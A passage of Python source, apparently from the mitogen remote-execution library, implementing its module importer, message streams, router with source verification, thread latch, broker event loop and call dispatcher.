_vv and IOLOG.debug('find_module(%r) returning self', fullname)
return self
finally:
del _tls.running
def _refuse_imports(self, fullname):
if is_blacklisted_import(self, fullname):
raise ImportError('Refused: ' + fullname)
f = sys._getframe(2)
requestee = f.f_globals['__name__']
if fullname == '__main__' and requestee == 'pkg_resources':
# Anything that imports pkg_resources will eventually cause
# pkg_resources to try and scan __main__ for its __requires__
# attribute (pkg_resources/__init__.py::_build_master()). This
# breaks any app that is not expecting its __main__ to suddenly be
# sucked over a network and injected into a remote process, like
# py.test.
raise ImportError('Refused')
if fullname == 'pbr':
# It claims to use pkg_resources to read version information, which
# would result in PEP-302 being used, but it actually does direct
# filesystem access. So instead smodge the environment to override
# any version that was defined. This will probably break something
# later.
os.environ['PBR_VERSION'] = '0.0.0'
def _on_load_module(self, msg):
if msg.is_dead:
return
tup = msg.unpickle()
fullname = tup[0]
_v and LOG.debug('Importer._on_load_module(%r)', fullname)
self._lock.acquire()
try:
self._cache[fullname] = tup
callbacks = self._callbacks.pop(fullname, [])
finally:
self._lock.release()
for callback in callbacks:
callback()
def _request_module(self, fullname, callback):
self._lock.acquire()
try:
present = fullname in self._cache
if not present:
funcs = self._callbacks.get(fullname)
if funcs is not None:
_v and LOG.debug('_request_module(%r): in flight', fullname)
funcs.append(callback)
else:
_v and LOG.debug('_request_module(%r): new request', fullname)
self._callbacks[fullname] = [callback]
self._context.send(
Message(data=b(fullname), handle=GET_MODULE)
)
finally:
self._lock.release()
if present:
callback()
def load_module(self, fullname):
fullname = to_text(fullname)
_v and LOG.debug('Importer.load_module(%r)', fullname)
self._refuse_imports(fullname)
event = threading.Event()
self._request_module(fullname, event.set)
event.wait()
ret = self._cache[fullname]
if ret[2] is None:
raise ImportError('Master does not have %r' % (fullname,))
pkg_present = ret[1]
mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
mod.__file__ = self.get_filename(fullname)
mod.__loader__ = self
if pkg_present is not None: # it's a package.
mod.__path__ = []
mod.__package__ = fullname
self._present[fullname] = pkg_present
else:
mod.__package__ = fullname.rpartition('.')[0] or None
if mod.__package__ and not PY3:
# 2.x requires __package__ to be exactly a string.
mod.__package__ = mod.__package__.encode()
source = self.get_source(fullname)
code = compile(source, mod.__file__, 'exec', 0, 1)
if PY3:
exec(code, vars(mod))
else:
exec('exec code in vars(mod)')
return mod
def get_filename(self, fullname):
if fullname in self._cache:
path = self._cache[fullname][2]
if path is None:
# If find_loader() returns self but a subsequent master RPC
# reveals the module can't be loaded, and so load_module()
# throws ImportError, on Python 3.x it is still possible for
# the loader to be called to fetch metadata.
raise ImportError('master cannot serve %r' % (fullname,))
return u'master:' + self._cache[fullname][2]
def get_source(self, fullname):
if fullname in self._cache:
compressed = self._cache[fullname][3]
if compressed is None:
raise ImportError('master cannot serve %r' % (fullname,))
source = zlib.decompress(self._cache[fullname][3])
if PY3:
return to_text(source)
return source
class LogHandler(logging.Handler):
def __init__(self, context):
logging.Handler.__init__(self)
self.context = context
self.local = threading.local()
self._buffer = []
def uncork(self):
self._send = self.context.send
for msg in self._buffer:
self._send(msg)
self._buffer = None
def _send(self, msg):
self._buffer.append(msg)
def emit(self, rec):
if rec.name == 'mitogen.io' or \
getattr(self.local, 'in_emit', False):
return
self.local.in_emit = True
try:
msg = self.format(rec)
encoded = '%s\x00%s\x00%s' % (rec.name, rec.levelno, msg)
if isinstance(encoded, UnicodeType):
# Logging package emits both :(
encoded = encoded.encode('utf-8')
self._send(Message(data=encoded, handle=FORWARD_LOG))
finally:
self.local.in_emit = False
class Side(object):
_fork_refs = weakref.WeakValueDictionary()
def __init__(self, stream, fd, cloexec=True, keep_alive=True, blocking=False):
self.stream = stream
self.fd = fd
self.closed = False
self.keep_alive = keep_alive
self._fork_refs[id(self)] = self
if cloexec:
set_cloexec(fd)
if not blocking:
set_nonblock(fd)
def __repr__(self):
return '<Side of %r fd %s>' % (self.stream, self.fd)
@classmethod
def _on_fork(cls):
for side in list(cls._fork_refs.values()):
side.close()
def close(self):
if not self.closed:
_vv and IOLOG.debug('%r.close()', self)
self.closed = True
os.close(self.fd)
def read(self, n=CHUNK_SIZE):
if self.closed:
# Refuse to touch the handle after closed, it may have been reused
# by another thread. TODO: synchronize read()/write()/close().
return b('')
s, disconnected = io_op(os.read, self.fd, n)
if disconnected:
return b('')
return s
def write(self, s):
if self.closed or self.fd is None:
# Refuse to touch the handle after closed, it may have been reused
# by another thread.
return None
written, disconnected = io_op(os.write, self.fd, s)
if disconnected:
return None
return written
class BasicStream(object):
receive_side = None
transmit_side = None
def on_disconnect(self, broker):
LOG.debug('%r.on_disconnect()', self)
if self.receive_side:
broker.stop_receive(self)
self.receive_side.close()
if self.transmit_side:
broker._stop_transmit(self)
self.transmit_side.close()
fire(self, 'disconnect')
def on_shutdown(self, broker):
_v and LOG.debug('%r.on_shutdown()', self)
fire(self, 'shutdown')
self.on_disconnect(broker)
class Stream(BasicStream):
"""
:py:class:`BasicStream` subclass implementing mitogen's :ref:`stream
protocol <stream-protocol>`.
"""
#: If not :data:`None`, :py:class:`Router` stamps this into
#: :py:attr:`Message.auth_id` of every message received on this stream.
auth_id = None
#: If not :data:`False`, indicates the stream has :attr:`auth_id` set and
#: its value is the same as :data:`mitogen.context_id` or appears in
#: :data:`mitogen.parent_ids`.
is_privileged = False
def __init__(self, router, remote_id, **kwargs):
self._router = router
self.remote_id = remote_id
self.name = u'default'
self.sent_modules = set(['mitogen', 'mitogen.core'])
self.construct(**kwargs)
self._input_buf = collections.deque()
self._output_buf = collections.deque()
self._input_buf_len = 0
self._output_buf_len = 0
def construct(self):
pass
def _internal_receive(self, broker, buf):
if self._input_buf and self._input_buf_len < 128:
self._input_buf[0] += buf
else:
self._input_buf.append(buf)
self._input_buf_len += len(buf)
while self._receive_one(broker):
pass
def on_receive(self, broker):
"""Handle the next complete message on the stream. Raise
:py:class:`StreamError` on failure."""
_vv and IOLOG.debug('%r.on_receive()', self)
buf = self.receive_side.read()
if not buf:
return self.on_disconnect(broker)
self._internal_receive(broker, buf)
HEADER_FMT = '>LLLLLL'
HEADER_LEN = struct.calcsize(HEADER_FMT)
def _receive_one(self, broker):
if self._input_buf_len < self.HEADER_LEN:
return False
msg = Message()
msg.router = self._router
(msg.dst_id, msg.src_id, msg.auth_id,
msg.handle, msg.reply_to, msg_len) = struct.unpack(
self.HEADER_FMT,
self._input_buf[0][:self.HEADER_LEN],
)
if msg_len > self._router.max_message_size:
LOG.error('Maximum message size exceeded (got %d, max %d)',
msg_len, self._router.max_message_size)
self.on_disconnect(broker)
return False
total_len = msg_len + self.HEADER_LEN
if self._input_buf_len < total_len:
_vv and IOLOG.debug(
'%r: Input too short (want %d, got %d)',
self, msg_len, self._input_buf_len - self.HEADER_LEN
)
return False
start = self.HEADER_LEN
prev_start = start
remain = total_len
bits = []
while remain:
buf = self._input_buf.popleft()
bit = buf[start:remain]
bits.append(bit)
remain -= len(bit) + start
prev_start = start
start = 0
msg.data = b('').join(bits)
self._input_buf.appendleft(buf[prev_start+len(bit):])
self._input_buf_len -= total_len
self._router._async_route(msg, self)
return True
def pending_bytes(self):
return self._output_buf_len
def on_transmit(self, broker):
"""Transmit buffered messages."""
_vv and IOLOG.debug('%r.on_transmit()', self)
if self._output_buf:
buf = self._output_buf.popleft()
written = self.transmit_side.write(buf)
if not written:
_v and LOG.debug('%r.on_transmit(): disconnection detected', self)
self.on_disconnect(broker)
return
elif written != len(buf):
self._output_buf.appendleft(BufferType(buf, written))
_vv and IOLOG.debug('%r.on_transmit() -> len %d', self, written)
self._output_buf_len -= written
if not self._output_buf:
broker._stop_transmit(self)
def _send(self, msg):
_vv and IOLOG.debug('%r._send(%r)', self, msg)
pkt = struct.pack(self.HEADER_FMT, msg.dst_id, msg.src_id,
msg.auth_id, msg.handle, msg.reply_to or 0,
len(msg.data)) + msg.data
if not self._output_buf_len:
self._router.broker._start_transmit(self)
self._output_buf.append(pkt)
self._output_buf_len += len(pkt)
def send(self, msg):
"""Send `data` to `handle`, and tell the broker we have output. May
be called from any thread."""
self._router.broker.defer(self._send, msg)
def on_shutdown(self, broker):
"""Override BasicStream behaviour of immediately disconnecting."""
_v and LOG.debug('%r.on_shutdown(%r)', self, broker)
def accept(self, rfd, wfd):
# TODO: what is this os.dup for?
self.receive_side = Side(self, os.dup(rfd))
self.transmit_side = Side(self, os.dup(wfd))
def __repr__(self):
cls = type(self)
return '%s.%s(%r)' % (cls.__module__, cls.__name__, self.name)
class Context(object):
remote_name = None
def __init__(self, router, context_id, name=None):
self.router = router
self.context_id = context_id
self.name = name
def __reduce__(self):
name = self.name
if name and not isinstance(name, UnicodeType):
name = UnicodeType(name, 'utf-8')
return _unpickle_context, (self.context_id, name)
def on_disconnect(self):
_v and LOG.debug('%r.on_disconnect()', self)
fire(self, 'disconnect')
def send_async(self, msg, persist=False):
if self.router.broker._thread == threading.currentThread(): # TODO
raise SystemError('Cannot making blocking call on broker thread')
receiver = Receiver(self.router, persist=persist, respondent=self)
msg.dst_id = self.context_id
msg.reply_to = receiver.handle
_v and LOG.debug('%r.send_async(%r)', self, msg)
self.send(msg)
return receiver
def call_service_async(self, service_name, method_name, **kwargs):
_v and LOG.debug('%r.call_service_async(%r, %r, %r)',
self, service_name, method_name, kwargs)
if isinstance(service_name, BytesType):
service_name = service_name.encode('utf-8')
elif not isinstance(service_name, UnicodeType):
service_name = service_name.name() # Service.name()
tup = (service_name, to_text(method_name), Kwargs(kwargs))
msg = Message.pickled(tup, handle=CALL_SERVICE)
return self.send_async(msg)
def send(self, msg):
"""send `obj` to `handle`, and tell the broker we have output. May
be called from any thread."""
msg.dst_id = self.context_id
self.router.route(msg)
def call_service(self, service_name, method_name, **kwargs):
recv = self.call_service_async(service_name, method_name, **kwargs)
return recv.get().unpickle()
def send_await(self, msg, deadline=None):
"""Send `msg` and wait for a response with an optional timeout."""
receiver = self.send_async(msg)
response = receiver.get(deadline)
data = response.unpickle()
_vv and IOLOG.debug('%r._send_await() -> %r', self, data)
return data
def __repr__(self):
return 'Context(%s, %r)' % (self.context_id, self.name)
def _unpickle_context(router, context_id, name):
if not (isinstance(router, Router) and
isinstance(context_id, (int, long)) and context_id >= 0 and (
(name is None) or
(isinstance(name, UnicodeType) and len(name) < 100))
):
raise TypeError('cannot unpickle Context: bad input')
return router.context_class(router, context_id, name)
class Poller(object):
def __init__(self):
self._rfds = {}
self._wfds = {}
@property
def readers(self):
return list(self._rfds.items())
@property
def writers(self):
return list(self._wfds.items())
def __repr__(self):
return '%s(%#x)' % (type(self).__name__, id(self))
def close(self):
pass
def start_receive(self, fd, data=None):
self._rfds[fd] = data or fd
def stop_receive(self, fd):
self._rfds.pop(fd, None)
def start_transmit(self, fd, data=None):
self._wfds[fd] = data or fd
def stop_transmit(self, fd):
self._wfds.pop(fd, None)
def poll(self, timeout=None):
_vv and IOLOG.debug('%r.poll(%r)', self, timeout)
(rfds, wfds, _), _ = io_op(select.select,
self._rfds,
self._wfds,
(), timeout
)
for fd in rfds:
_vv and IOLOG.debug('%r: POLLIN for %r', self, fd)
yield self._rfds[fd]
for fd in wfds:
_vv and IOLOG.debug('%r: POLLOUT for %r', self, fd)
yield self._wfds[fd]
class Latch(object):
"""
A latch is a :py:class:`Queue.Queue`-like object that supports mutation and
waiting from multiple threads, however unlike :py:class:`Queue.Queue`,
waiting threads always remain interruptible, so CTRL+C always succeeds, and
waits where a timeout is set experience no wake up latency. These
properties are not possible in combination using the built-in threading
primitives available in Python 2.x.
Latches implement queues using the UNIX self-pipe trick, and a per-thread
:py:func:`socket.socketpair` that is lazily created the first time any
latch attempts to sleep on a thread, and dynamically associated with the
waiting Latch only for duration of the wait.
See :ref:`waking-sleeping-threads` for further discussion.
"""
poller_class = Poller
# The _cls_ prefixes here are to make it crystal clear in the code which
# state mutation isn't covered by :attr:`_lock`.
#: List of reusable :func:`socket.socketpair` tuples. The list is from
#: multiple threads, the only safe operations are `append()` and `pop()`.
_cls_idle_socketpairs = []
#: List of every socket object that must be closed by :meth:`_on_fork`.
#: Inherited descriptors cannot be reused, as the duplicated handles
#: reference the same underlying kernel-side sockets still in use by
#: the parent process.
_cls_all_sockets = []
def __init__(self):
self.closed = False
self._lock = threading.Lock()
#: List of unconsumed enqueued items.
self._queue = []
#: List of `(wsock, cookie)` awaiting an element, where `wsock` is the
#: socketpair's write side, and `cookie` is the string to write.
self._sleeping = []
#: Number of elements of :attr:`_sleeping` that have already been
#: woken, and have a corresponding element index from :attr:`_queue`
#: assigned to them.
self._waking = 0
@classmethod
def _on_fork(cls):
"""
Clean up any files belonging to the parent process after a fork.
"""
cls._cls_idle_socketpairs = []
while cls._cls_all_sockets:
cls._cls_all_sockets.pop().close()
def close(self):
"""
Mark the latch as closed, and cause every sleeping thread to be woken,
with :py:class:`mitogen.core.LatchError` raised in each thread.
"""
self._lock.acquire()
try:
self.closed = True
while self._waking < len(self._sleeping):
wsock, cookie = self._sleeping[self._waking]
self._wake(wsock, cookie)
self._waking += 1
finally:
self._lock.release()
def empty(self):
"""
Return :py:data:`True` if calling :py:meth:`get` would block.
As with :py:class:`Queue.Queue`, :py:data:`True` may be returned even
though a subsequent call to :py:meth:`get` will succeed, since a
message may be posted at any moment between :py:meth:`empty` and
:py:meth:`get`.
As with :py:class:`Queue.Queue`, :py:data:`False` may be returned even
though a subsequent call to :py:meth:`get` will block, since another
waiting thread may be woken at any moment between :py:meth:`empty` and
:py:meth:`get`.
"""
return len(self._queue) == 0
def _get_socketpair(self):
"""
Return an unused socketpair, creating one if none exist.
"""
try:
return self._cls_idle_socketpairs.pop() # pop() must be atomic
except IndexError:
rsock, wsock = socket.socketpair()
set_cloexec(rsock.fileno())
set_cloexec(wsock.fileno())
self._cls_all_sockets.extend((rsock, wsock))
return rsock, wsock
COOKIE_SIZE = 33
def _make_cookie(self):
"""
Return a 33-byte string encoding the ID of the instance and the current
thread. This disambiguates legitimate wake-ups, accidental writes to
the FD, and buggy internal FD sharing.
"""
ident = threading.currentThread().ident
return b(u'%016x-%016x' % (int(id(self)), ident))
def get(self, timeout=None, block=True):
"""
Return the next enqueued object, or sleep waiting for one.
:param float timeout:
If not :py:data:`None`, specifies a timeout in seconds.
:param bool block:
If :py:data:`False`, immediately raise
:py:class:`mitogen.core.TimeoutError` if the latch is empty.
:raises mitogen.core.LatchError:
:py:meth:`close` has been called, and the object is no longer valid.
:raises mitogen.core.TimeoutError:
Timeout was reached.
:returns:
The de-queued object.
"""
_vv and IOLOG.debug('%r.get(timeout=%r, block=%r)',
self, timeout, block)
self._lock.acquire()
try:
if self.closed:
raise LatchError()
i = len(self._sleeping)
if len(self._queue) > i:
_vv and IOLOG.debug('%r.get() -> %r', self, self._queue[i])
return self._queue.pop(i)
if not block:
raise TimeoutError()
rsock, wsock = self._get_socketpair()
cookie = self._make_cookie()
self._sleeping.append((wsock, cookie))
finally:
self._lock.release()
poller = self.poller_class()
poller.start_receive(rsock.fileno())
try:
return self._get_sleep(poller, timeout, block, rsock, wsock, cookie)
finally:
poller.close()
def _get_sleep(self, poller, timeout, block, rsock, wsock, cookie):
"""
When a result is not immediately available, sleep waiting for
:meth:`put` to write a byte to our socket pair.
"""
_vv and IOLOG.debug(
'%r._get_sleep(timeout=%r, block=%r, rfd=%d, wfd=%d)',
self, timeout, block, rsock.fileno(), wsock.fileno()
)
e = None
woken = None
try:
woken = list(poller.poll(timeout))
except Exception:
e = sys.exc_info()[1]
self._lock.acquire()
try:
i = self._sleeping.index((wsock, cookie))
del self._sleeping[i]
if not woken:
raise e or TimeoutError()
got_cookie = rsock.recv(self.COOKIE_SIZE)
self._cls_idle_socketpairs.append((rsock, wsock))
assert cookie == got_cookie, (
"Cookie incorrect; got %r, expected %r" \
% (got_cookie, cookie)
)
assert i < self._waking, (
"Cookie correct, but no queue element assigned."
)
self._waking -= 1
if self.closed:
raise LatchError()
_vv and IOLOG.debug('%r.get() wake -> %r', self, self._queue[i])
return self._queue.pop(i)
finally:
self._lock.release()
def put(self, obj):
"""
Enqueue an object, waking the first thread waiting for a result, if one
exists.
:raises mitogen.core.LatchError:
:py:meth:`close` has been called, and the object is no longer valid.
"""
_vv and IOLOG.debug('%r.put(%r)', self, obj)
self._lock.acquire()
try:
if self.closed:
raise LatchError()
self._queue.append(obj)
if self._waking < len(self._sleeping):
wsock, cookie = self._sleeping[self._waking]
self._waking += 1
_vv and IOLOG.debug('%r.put() -> waking wfd=%r',
self, wsock.fileno())
self._wake(wsock, cookie)
finally:
self._lock.release()
def _wake(self, wsock, cookie):
try:
os.write(wsock.fileno(), cookie)
except OSError:
e = sys.exc_info()[1]
if e.args[0] != errno.EBADF:
raise
def __repr__(self):
return 'Latch(%#x, size=%d, t=%r)' % (
id(self),
len(self._queue),
threading.currentThread().name,
)
class Waker(BasicStream):
"""
:py:class:`BasicStream` subclass implementing the `UNIX self-pipe trick`_.
Used to wake the multiplexer when another thread needs to modify its state
(via a cross-thread function call).
.. _UNIX self-pipe trick: https://cr.yp.to/docs/selfpipe.html
"""
broker_ident = None
def __init__(self, broker):
self._broker = broker
self._lock = threading.Lock()
self._deferred = []
rfd, wfd = os.pipe()
self.receive_side = Side(self, rfd)
self.transmit_side = Side(self, wfd)
def __repr__(self):
return 'Waker(%r rfd=%r, wfd=%r)' % (
self._broker,
self.receive_side.fd,
self.transmit_side.fd,
)
@property
def keep_alive(self):
"""
Prevent immediate Broker shutdown while deferred functions remain.
"""
self._lock.acquire()
try:
return len(self._deferred)
finally:
self._lock.release()
def on_receive(self, broker):
"""
Drain the pipe and fire callbacks. Reading multiple bytes is safe since
new bytes corresponding to future .defer() calls are written only after
.defer() takes _lock: either a byte we read corresponds to something
already on the queue by the time we take _lock, or a byte remains
buffered, causing another wake up, because it was written after we
released _lock.
"""
_vv and IOLOG.debug('%r.on_receive()', self)
self.receive_side.read(128)
self._lock.acquire()
try:
deferred = self._deferred
self._deferred = []
finally:
self._lock.release()
for func, args, kwargs in deferred:
try:
func(*args, **kwargs)
except Exception:
LOG.exception('defer() crashed: %r(*%r, **%r)',
func, args, kwargs)
self._broker.shutdown()
def defer(self, func, *args, **kwargs):
if threading.currentThread().ident == self.broker_ident:
_vv and IOLOG.debug('%r.defer() [immediate]', self)
return func(*args, **kwargs)
_vv and IOLOG.debug('%r.defer() [fd=%r]', self, self.transmit_side.fd)
self._lock.acquire()
try:
self._deferred.append((func, args, kwargs))
finally:
self._lock.release()
# Wake the multiplexer by writing a byte. If the broker is in the midst
# of tearing itself down, the waker fd may already have been closed, so
# ignore EBADF here.
try:
self.transmit_side.write(b(' '))
except OSError:
e = sys.exc_info()[1]
if e.args[0] != errno.EBADF:
raise
class IoLogger(BasicStream):
"""
:py:class:`BasicStream` subclass that sets up redirection of a standard
UNIX file descriptor back into the Python :py:mod:`logging` package.
"""
_buf = ''
def __init__(self, broker, name, dest_fd):
self._broker = broker
self._name = name
self._log = logging.getLogger(name)
self._rsock, self._wsock = socket.socketpair()
os.dup2(self._wsock.fileno(), dest_fd)
set_cloexec(self._wsock.fileno())
self.receive_side = Side(self, self._rsock.fileno())
self.transmit_side = Side(self, dest_fd, cloexec=False, blocking=True)
self._broker.start_receive(self)
def __repr__(self):
return '<IoLogger %s>' % (self._name,)
def _log_lines(self):
while self._buf.find('\n') != -1:
line, _, self._buf = self._buf.partition('\n')
self._log.info('%s', line.rstrip('\n'))
def on_shutdown(self, broker):
"""Shut down the write end of the logging socket."""
_v and LOG.debug('%r.on_shutdown()', self)
self._wsock.shutdown(socket.SHUT_WR)
self._wsock.close()
self.transmit_side.close()
def on_receive(self, broker):
_vv and IOLOG.debug('%r.on_receive()', self)
buf = self.receive_side.read()
if not buf:
return self.on_disconnect(broker)
self._buf += buf.decode('latin1')
self._log_lines()
class Router(object):
context_class = Context
max_message_size = 128 * 1048576
unidirectional = False
def __init__(self, broker):
self.broker = broker
listen(broker, 'exit', self._on_broker_exit)
# Here seems as good a place as any.
global _v, _vv
_v = logging.getLogger().level <= logging.DEBUG
_vv = IOLOG.level <= logging.DEBUG
#: context ID -> Stream
self._stream_by_id = {}
#: List of contexts to notify of shutdown.
self._context_by_id = {}
self._last_handle = itertools.count(1000)
#: handle -> (persistent?, func(msg))
self._handle_map = {}
def __repr__(self):
return 'Router(%r)' % (self.broker,)
def on_stream_disconnect(self, stream):
for context in self._context_by_id.values():
stream_ = self._stream_by_id.get(context.context_id)
if stream_ is stream:
del self._stream_by_id[context.context_id]
context.on_disconnect()
def _on_broker_exit(self):
while self._handle_map:
_, (_, func, _) = self._handle_map.popitem()
func(Message.dead())
def register(self, context, stream):
_v and LOG.debug('register(%r, %r)', context, stream)
self._stream_by_id[context.context_id] = stream
self._context_by_id[context.context_id] = context
self.broker.start_receive(stream)
listen(stream, 'disconnect', lambda: self.on_stream_disconnect(stream))
def stream_by_id(self, dst_id):
return self._stream_by_id.get(dst_id,
self._stream_by_id.get(mitogen.parent_id))
def del_handler(self, handle):
del self._handle_map[handle]
def add_handler(self, fn, handle=None, persist=True,
policy=None, respondent=None):
handle = handle or next(self._last_handle)
_vv and IOLOG.debug('%r.add_handler(%r, %r, %r)', self, fn, handle, persist)
if respondent:
assert policy is None
def policy(msg, _stream):
return msg.is_dead or msg.src_id == respondent.context_id
def on_disconnect():
if handle in self._handle_map:
fn(Message.dead())
del self._handle_map[handle]
listen(respondent, 'disconnect', on_disconnect)
self._handle_map[handle] = persist, fn, policy
return handle
def on_shutdown(self, broker):
"""Called during :py:meth:`Broker.shutdown`, informs callbacks
registered with :py:meth:`add_handle_cb` the connection is dead."""
_v and LOG.debug('%r.on_shutdown(%r)', self, broker)
fire(self, 'shutdown')
for handle, (persist, fn) in self._handle_map.iteritems():
_v and LOG.debug('%r.on_shutdown(): killing %r: %r', self, handle, fn)
fn(Message.dead())
refused_msg = 'Refused by policy.'
def _invoke(self, msg, stream):
# IOLOG.debug('%r._invoke(%r)', self, msg)
try:
persist, fn, policy = self._handle_map[msg.handle]
except KeyError:
LOG.error('%r: invalid handle: %r', self, msg)
if msg.reply_to and not msg.is_dead:
msg.reply(Message.dead())
return
if policy and not policy(msg, stream):
LOG.error('%r: policy refused message: %r', self, msg)
if msg.reply_to:
self.route(Message.pickled(
CallError(self.refused_msg),
dst_id=msg.src_id,
handle=msg.reply_to
))
return
if not persist:
del self._handle_map[msg.handle]
try:
fn(msg)
except Exception:
LOG.exception('%r._invoke(%r): %r crashed', self, msg, fn)
def _async_route(self, msg, in_stream=None):
_vv and IOLOG.debug('%r._async_route(%r, %r)', self, msg, in_stream)
if len(msg.data) > self.max_message_size:
LOG.error('message too large (max %d bytes): %r',
self.max_message_size, msg)
return
# Perform source verification.
if in_stream:
parent = self._stream_by_id.get(mitogen.parent_id)
expect = self._stream_by_id.get(msg.auth_id, parent)
if in_stream != expect:
LOG.error('%r: bad auth_id: got %r via %r, not %r: %r',
self, msg.auth_id, in_stream, expect, msg)
return
if msg.src_id != msg.auth_id:
expect = self._stream_by_id.get(msg.src_id, parent)
if in_stream != expect:
LOG.error('%r: bad src_id: got %r via %r, not %r: %r',
self, msg.src_id, in_stream, expect, msg)
return
if in_stream.auth_id is not None:
msg.auth_id = in_stream.auth_id
if msg.dst_id == mitogen.context_id:
return self._invoke(msg, in_stream)
out_stream = self._stream_by_id.get(msg.dst_id)
if out_stream is None:
out_stream = self._stream_by_id.get(mitogen.parent_id)
dead = False
if out_stream is None:
LOG.error('%r: no route for %r, my ID is %r',
self, msg, mitogen.context_id)
dead = True
if in_stream and self.unidirectional and not dead and \
not (in_stream.is_privileged or out_stream.is_privileged):
LOG.error('routing mode prevents forward of %r from %r -> %r',
msg, in_stream, out_stream)
dead = True
if dead:
if msg.reply_to and not msg.is_dead:
msg.reply(Message.dead(), router=self)
return
out_stream._send(msg)
def route(self, msg):
self.broker.defer(self._async_route, msg)
class Broker(object):
poller_class = Poller
_waker = None
_thread = None
shutdown_timeout = 3.0
def __init__(self, poller_class=None):
self._alive = True
self._waker = Waker(self)
self.defer = self._waker.defer
self.poller = self.poller_class()
self.poller.start_receive(
self._waker.receive_side.fd,
(self._waker.receive_side, self._waker.on_receive)
)
self._thread = threading.Thread(
target=_profile_hook,
args=('broker', self._broker_main),
name='mitogen-broker'
)
self._thread.start()
self._waker.broker_ident = self._thread.ident
def start_receive(self, stream):
_vv and IOLOG.debug('%r.start_receive(%r)', self, stream)
side = stream.receive_side
assert side and side.fd is not None
self.defer(self.poller.start_receive,
side.fd, (side, stream.on_receive))
def stop_receive(self, stream):
_vv and IOLOG.debug('%r.stop_receive(%r)', self, stream)
self.defer(self.poller.stop_receive, stream.receive_side.fd)
def _start_transmit(self, stream):
_vv and IOLOG.debug('%r._start_transmit(%r)', self, stream)
side = stream.transmit_side
assert side and side.fd is not None
self.poller.start_transmit(side.fd, (side, stream.on_transmit))
def _stop_transmit(self, stream):
_vv and IOLOG.debug('%r._stop_transmit(%r)', self, stream)
self.poller.stop_transmit(stream.transmit_side.fd)
def keep_alive(self):
it = (side.keep_alive for (_, (side, _)) in self.poller.readers)
return sum(it, 0)
def _call(self, stream, func):
try:
func(self)
except Exception:
LOG.exception('%r crashed', stream)
stream.on_disconnect(self)
def _loop_once(self, timeout=None):
_vv and IOLOG.debug('%r._loop_once(%r, %r)',
self, timeout, self.poller)
#IOLOG.debug('readers =\n%s', pformat(self.poller.readers))
#IOLOG.debug('writers =\n%s', pformat(self.poller.writers))
for (side, func) in self.poller.poll(timeout):
self._call(side.stream, func)
def _broker_main(self):
try:
while self._alive:
self._loop_once()
fire(self, 'shutdown')
for _, (side, _) in self.poller.readers + self.poller.writers:
self._call(side.stream, side.stream.on_shutdown)
deadline = time.time() + self.shutdown_timeout
while self.keep_alive() and time.time() < deadline:
self._loop_once(max(0, deadline - time.time()))
if self.keep_alive():
LOG.error('%r: some streams did not close gracefully. '
'The most likely cause for this is one or '
'more child processes still connected to '
'our stdout/stderr pipes.', self)
for _, (side, _) in self.poller.readers + self.poller.writers:
LOG.error('_broker_main() force disconnecting %r', side)
side.stream.on_disconnect(self)
except Exception:
LOG.exception('_broker_main() crashed')
fire(self, 'exit')
def shutdown(self):
_v and LOG.debug('%r.shutdown()', self)
def _shutdown():
self._alive = False
self.defer(_shutdown)
def join(self):
self._thread.join()
def __repr__(self):
return 'Broker(%#x)' % (id(self),)
class Dispatcher(object):
def __init__(self, econtext):
self.econtext = econtext
#: Chain ID -> CallError if prior call failed.
self._error_by_chain_id = {}
self.recv = Receiver(router=econtext.router,
handle=CALL_FUNCTION,
policy=has_parent_authority)
listen(econtext.broker, 'shutdown', self.recv.close)
@classmethod
@takes_econtext
def forget_chain(cls, chain_id, econtext):
econtext.dispatcher._error_by_chain_id.pop(chain_id, None)
def _parse_request(self, msg):
data = msg.unpickle(throw=False)
_v and LOG.debug('_dispatch_one(%r)', data)
chain_id, modname, klass, func, args, kwargs = data
obj = import_module(modname)
if klass:
obj = getattr(obj, klass)
fn = getattr(obj, func)
if getattr(fn, 'mitogen_takes_econtext', None):
kwargs.setdefault('econtext', self.econtext)
if getattr(fn, 'mitogen_takes_router', None):
kwargs.setdefault('router', self.econtext.router)
return chain_id, fn, args, kwargs
def _dispatch_one(self, msg):
try:
chain_id, fn, args, kwargs = self._parse_request(msg)
except Exception:
return None, CallError(sys.exc_info()[1])
if chain_id in self._error_by_chain_id:
return chain_id, self._error_by_chain_id[chain_id]
try:
return chain_id, fn(*args, **kwargs)
except Exception:
e = CallError(sys.exc_info()[1])
if chain_id is not None:
self._error_by_chain_id[chain_id] = e
return chain_id, e
def _dispatch_calls(self):
for msg in self.recv:
chain_id, ret = self._dispatch_one(msg)
_v and LOG.debug('_dispatch_calls: %r -> %r', msg, ret)
if msg.reply_to:
msg.reply(ret)
elif isinstance(ret, CallError) and chain_id is None:
LOG.error('No-reply function call failed: %s', ret)
def run(self):
if self.econtext.config.get('on_start'):
self.econtext.config['on_start'](self.econtext)
_profile_hook('main', self._dispatch_calls)
class ExternalContext(object):
detached = False
def __init__(self, config):
self.config = config
def _on_broker_exit(self):
if not self.config['profiling']:
os.kill(os.getpid(), signal.SIGTERM)
def _service_stub_main(self, msg):
import mitogen.service
pool = mitogen.service.get_or_create_pool(router=self.router)
pool._receiver._on_receive(msg)
def _on_call_service_msg(self, msg):
"""
Stub service handler. Start a thread to import the mitogen.service
implementation from, and deliver the message to the newly constructed
pool. This must be done as CALL_SERVICE for e.g. PushFileService may
race with a CALL_FUNCTION blocking the main thread waiting for a result
from that service.
"""
if not msg.is_dead:
th = threading.Thread(target=self._service_stub_main, args=(msg,))
th.start()
def _on_shutdown_msg(self, msg):
_v and LOG.debug('_on_shutdown_msg(%r)', msg)
if not msg.is_dead:
self.broker.shutdown()
def _on_parent_disconnect(self):
if self.detached:
mitogen.parent_ids = []
mitogen.parent_id = None
LOG.info('Detachment complete')
else:
_v and LOG.debug('%r: parent stream is gone, dying.', self)
self.broker.shutdown()
def _sync(self, func):
latch = Latch()
self.broker.defer(lambda: latch.put(func()))
return latch.get()
def detach(self):
self.detached = True
stream = self.router.stream_by_id(mitogen.parent_id)
if stream: # not double-detach()'d
os.setsid()
self.parent.send_await(Message(handle=DETACHING))
LOG.info('Detaching from %r; parent is %s', stream, self.parent)
for x in range(20):
pending = self._sync(lambda: stream.pending_bytes())
if not pending:
break
time.sleep(0.05)
if pending:
LOG.error('Stream had %d bytes after 2000ms', pending)
self.broker.defer(stream.on_disconnect, self.broker)
def _setup_master(self):
Router.max_message_size = self.config['max_message_size']
if self.config['profiling']:
enable_profiling()
self.broker = Broker()
self.router = Router(self.broker)
self.router.debug = self.config.get('debug', False)
self.router.undirectional = self.config['unidirectional']
self.router.add_handler(
fn=self._on_shutdown_msg,
